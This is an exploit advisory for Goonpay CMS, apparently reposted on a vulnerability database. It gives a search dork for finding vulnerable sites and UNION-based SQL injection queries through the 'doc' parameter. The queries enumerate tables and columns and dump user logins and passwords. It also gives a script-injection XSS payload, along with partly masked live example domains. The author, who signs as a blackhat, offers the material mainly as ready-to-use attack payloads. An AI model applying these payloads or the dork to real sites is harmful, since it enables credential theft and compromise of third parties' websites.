Goonpay CMS Multiple Vulnerability

2013.10.13
Credit: Arsan
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: inurl:\"/?doc=\" , intext:\"Conception graphique : goonpay.com\"

#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~# # # Exploit Title: Goonpay CMS Multiple Vulnerability # Date: 2013 12 October # Author: Arsan # Vendor Homepage: http://www.goonpay.com # Version : All Version # Security Risk: High # Tested on: Backtrack # Category: webapps # Google Dork: inurl:"/?doc=" , intext:"Conception graphique : goonpay.com" # #~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~# # # [+] Exploit : # # [-] Description : # SQL Injection And XSS In (index.php) Parameter "doc" : # http://<server>/?doc=[SQL-Injection][XSS] # [-] Description Exploit : #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # ----------[SQL Injection] # (+) Tables Name: # (+) Query : # +union+select+1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from information_schema.tables where table_schema=database()-- # _recettes # departements # doctypes # documents # galeries # notesRecettes # sharedRecettes # timesConvertor # users # usersaccreditations # userslvl # ---------- # (+) User Table (users) Columns : # (+) Query : # +union+select+1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from information_schema.columns where table_name=0x7573657273 # id # login # pass # nom # mail # dept # userlvl # adresse # tel # prenom # date_naissance # lieu_naissance # cp # ville # nom_entreprise # lieu_entreprise # domaine_competence_entreprise # fonction_entreprise # tel_pro # hobbies # photo # ---------- # (+) User And Password In : login,0x3a,pass # (+) Query : # +union+select+1,2,group_concat(login,0x3a,pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from users # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # ----------[XSS] # Just Insert This Code After Url : # "><script>alert(/Arsan/)</script> # Example : # http://dietiXoandco.fr/?doc="><script>alert(/Arsan/)</script> # http://redXden.com/?doc="><script>alert(/Arsan/)</script> # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~# # # [+] Demo : # # http://dietisXoandco.fr/?doc=[SQL-Injection][XSS] # http://redraXen.com/?doc=[SQL-Injection][XSS] # #~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~# # # [+] Contact Me : # # Arsan.Blackhat@gmail.com # Twitter.com/ArsanBlackhat # #~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~# # I L0ve Inj3ct0r Team #~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top